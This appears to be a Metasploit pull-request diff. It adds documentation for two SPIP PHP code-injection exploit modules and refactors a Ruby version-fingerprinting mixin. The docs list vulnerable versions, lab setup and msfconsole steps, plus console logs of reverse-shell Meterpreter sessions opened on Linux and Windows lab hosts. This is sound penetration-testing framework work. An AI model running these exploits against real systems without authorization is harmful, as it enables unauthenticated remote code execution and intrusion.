Refactoring SPIP Modules for Windows Compatibility and Incorporating SPIP Mixin

Author: Chocapikk

documentation/modules/exploit/multi/http/spip_connect_exec.md

@@ -0,0 +1,149 @@
+## Vulnerable Application
+
+This module exploits a PHP code injection vulnerability in SPIP.
+The vulnerability exists in the `connect` parameter, allowing an unauthenticated
+user to execute arbitrary commands with web user privileges.
+Branches 2.0, 2.1, and 3 are affected.
+Vulnerable versions are < 2.0.21, < 2.1.16, and < 3.0.3.
+This module is compatible with both Unix/Linux and Windows platforms, and has been successfully tested on SPIP 2.0.11 and SPIP 2.0.20
+on Apache running on Ubuntu, Fedora, and Windows Server.
+
+The module's `check` method attempts to obtain the SPIP version via a simple HTTP
+GET request to the `/spip.php` page and fingerprints it either via the `generator` meta tag or the `Composed-By` header.
+
+## Setup
+
+On Ubuntu 20.04, download a vulnerable instance of SPIP:
+
+```
+wget https://files.spip.net/spip/archives/SPIP-v2-0-0.zip
+```
+
+Unzip it to a specific folder:
+
+```
+mkdir spip-site 
+cp SPIP-v2-0-0.zip spip-site/ 
+cd spip-site/ 
+unzip SPIP-v2-0-0.zip
+```
+
+Install PHP 5.6 and the necessary extensions:
+
+1. Add the PPA for PHP 5.6:
+
+```
+sudo add-apt-repository ppa:ondrej/php
+sudo apt-get update
+```
+
+2. Install PHP 5.6 with SQLite extensions:
+
+```
+sudo apt-get install php5.6 php5.6-sqlite php5.6-sqlite3
+```
+
+3. Enable the required extensions in the PHP configuration file:
+
+Open the PHP INI file for CLI:
+
+```
+sudo nano /etc/php/5.6/cli/php.ini
+```
+
+Add or uncomment the following lines:
+
+```
+extension=sqlite3.so
+extension=pdo_sqlite.so
+```
+
+Serve the application (while in the newly created spip-site directory):
+
+```
+php5.6 -S 127.0.0.1:8000
+```
+
+Navigate to the following URL, select `sqlite` for the database, and complete the installation:
+
+```
+http://127.0.0.1:8000/ecrire/
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/multi/http/spip_connect_exec`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `exploit`
+
+## Options
+
+No options
+
+## Targets
+
+### 0 (PHP In-Memory)
+
+This uses an in-memory PHP payload to execute code.
+
+### 1 (Unix/Linux Command Shell)
+
+This executes a Unix or Linux command.
+
+### 2 (Windows Command Shell)
+
+This executes a Windows command.
+
+## Scenarios
+
+### SPIP 2.0.0 - Linux target - PHP In-Memory
+
+```
+msf6 exploit(multi/http/spip_connect_exec) > run http://192.168.1.36:8000/
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 2.0.0
+[+] The target appears to be vulnerable.
+[*] 192.168.1.36:8000 - Attempting to exploit...
+[*] Sending stage (39927 bytes) to 192.168.1.36
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 192.168.1.36:47020) at 2024-08-22 19:19:00 +0200
+
+meterpreter > sysinfo 
+Computer    : linux
+OS          : Linux linux 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
+Meterpreter : php/linux
+meterpreter > 
+```
+
+### SPIP 2.0.0 - Unix/Linux Command Shell
+
+```
+msf6 exploit(multi/http/spip_connect_exec) > run http://192.168.1.36:8000/
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 2.0.0
+[+] The target appears to be vulnerable.
+[*] 192.168.1.36:8000 - Attempting to exploit...
+[*] Sending stage (3045380 bytes) to 192.168.1.36
+[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.36:32794) at 2024-08-22 19:20:41 +0200
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.36
+OS           : LinuxMint 21.3 (Linux 5.15.0-113-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### SPIP 2.0.0 - Windows Command Shell
+
+```
+Somehow, I was unable to obtain a remote code execution (RCE) on my lab environment using the Windows Command Shell target. 
+However, based on the exploit's design and its success on other platforms, it is expected to work. 
+The issue might be specific to my lab setup.
+```

documentation/modules/exploit/multi/http/spip_rce_form.md

@@ -0,0 +1,142 @@
+## Vulnerable Application
+
+This module exploits a PHP code injection in SPIP. The vulnerability exists in
+the `oubli` parameter and allows an unauthenticated user to execute arbitrary
+commands with web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are
+concerned. Vulnerable versions are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.
+
+The module's `check` method attempts to obtain the SPIP version via a simple HTTP GET request to `/spip.php`
+page and fingerprints it either via the `generator` meta tag, or by the
+`Composed-By` header.
+
+This module has been successfully tested against SPIP version 4.0.0.
+
+## Setup
+
+On Ubuntu 20.04, download a vulnerable instance of SPIP:
+
+```
+wget https://files.spip.net/spip/archives/spip-v4.2.0.zip
+```
+
+Unzip it to a specific folder:
+
+```
+mkdir spip-site 
+cp spip-v4.2.0.zip spip-site/ 
+cd spip-site / 
+unzip spip-v4.2.0.zip
+```
+
+Install php and the necessary extensions:
+
+```
+sudo apt install -y php-xml php-zip php-sqlite3
+```
+
+Serve the application (while in the newly created spip-site directory):
+
+```
+php -S 127.0.0.1:8000
+```
+
+Navigate to the following URL, select `sqlite` for the database, and complete the installation:
+
+```
+http://127.0.0.1:8000/ecrire/
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/multi/http/spip_rce_form`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `exploit`
+
+## Options
+
+No options
+
+## Targets
+
+### 0 (PHP In-Memory)
+
+This uses an in-memory PHP payload to execute code.
+
+### 1 (Unix/Linux Command Shell)
+
+This executes a Unix or Linux command.
+
+### 2 (Windows Command Shell)
+
+This executes a Windows command.
+
+## Scenarios
+### SPIP 4.2.0 - Linux target - PHP In-Memory
+```
+msf6 exploit(multi/http/spip_rce_form) > run http://127.0.0.1:8000
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.2.0
+[+] The target appears to be vulnerable.
+[*] Got anti-csrf token: ZHsLFRQTGY9p0wCEbpT7JK7YhYzOupYuxRemHQ1KrmNOIonsgMLbNrmlewZfSwqzqLwjMMOcYBE5vNpVUt42LFLfKdJC9p94qg==
+[*] 127.0.0.1:8000 - Attempting to exploit...
+[*] Sending stage (39927 bytes) to 192.168.1.36
+[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 192.168.1.36:36488) at 2024-08-22 15:01:39 +0200
+
+meterpreter > sysinfo 
+Computer    : linux
+OS          : Linux linux 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
+
+### SPIP 4.2.0 - Unix/Linux Command Shell
+
+```
+msf6 exploit(multi/http/spip_rce_form) > run http://127.0.0.1:8000
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.2.0
+[+] The target appears to be vulnerable.
+[*] Got anti-csrf token: ZHsLFRQTGY9p0wCEbpT7JK7YhYzOupYuxRemHQ1KrmNOIonsgMLbNrmlewZfSwqzqLwjMMOcYBE5vNpVUt42LFLfKdJC9p94qg==
+[*] 127.0.0.1:8000 - Attempting to exploit...
+[*] Sending stage (3045380 bytes) to 192.168.1.36
+[*] Meterpreter session 5 opened (192.168.1.36:4444 -> 192.168.1.36:46044) at 2024-08-22 15:03:31 +0200
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.36
+OS           : LinuxMint 21.3 (Linux 5.15.0-113-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### SPIP 4.2.0 - Windows Command Shell
+
+```
+msf6 exploit(multi/http/spip_rce_form) > run http://192.168.1.48
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.2.0
+[+] The target appears to be vulnerable.
+[*] Got anti-csrf token: Z1kE0G5FLDrWkF9cvFp5ZuEKbtEjqIxoWTXL9HxYFP/xXeUohvYklG+kfLo32Cas24teZEJVX4e10CE5HEAjZ4HpM7VAUZoh
+[*] 192.168.1.48:80 - Attempting to exploit...
+[*] Sending stage (201798 bytes) to 192.168.1.48
+[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 192.168.1.48:50092) at 2024-08-22 14:59:16 +0200
+
+meterpreter > sysinfo 
+Computer        : DESKTOP-NHU31ET
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : fr_FR
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > 
+```

lib/msf/core/exploit/remote/http/spip.rb

@@ -1,46 +1,45 @@
 # -*- coding: binary -*-
 
 module Msf
-module Exploit::Remote::HTTP::Spip
+  module Exploit::Remote::HTTP::Spip
+    include Msf::Exploit::Remote::HttpClient
 
-  include Msf::Exploit::Remote::HttpClient
+    def initialize(info = {})
+      super
 
-  def initialize(info = {})
-    super
+      register_options([
+        OptString.new('TARGETURI', [true, 'Path to Spip install', '/'])
+      ])
+    end
 
-    register_options([
-      OptString.new('TARGETURI', [true, 'Path to Spip install', '/'])
-    ])
-  end
+    # Determine Spip version
+    #
+    # @return [Rex::Version] Version as Rex::Version
+    def spip_version
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'spip.php')
+      )
 
-  # Determine Spip version
-  #
-  # @return [Rex::Version] Version as Rex::Version
-  def spip_version
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri'    => normalize_uri(target_uri.path, "spip.php")
-    )
+      return unless res
 
-    return unless res
+      version = nil
 
-    version = nil
+      potential_sources = [
+        res.get_html_document.at('head/meta[@name="generator"]/@content')&.text,
+        res.headers['Composed-By']
+      ]
 
-    version_string = res.get_html_document.at('head/meta[@name="generator"]/@content')&.text
-    if version_string =~ /SPIP (.*)/
-      version = ::Regexp.last_match(1)
-    end
+      potential_sources.each do |text|
+        next unless text
 
-    if version.nil? && res.headers['Composed-By'] =~ /SPIP (.*)/
-      version = ::Regexp.last_match(1)
-    end
+        if text =~ /SPIP\s(\d+(\.\d+)+)/
+          version = ::Regexp.last_match(1)
+          break
+        end
+      end
 
-    if version.nil?
-      return nil
+      return version ? Rex::Version.new(version) : nil
     end
-
-    return Rex::Version.new(version)
   end
-
-end
 end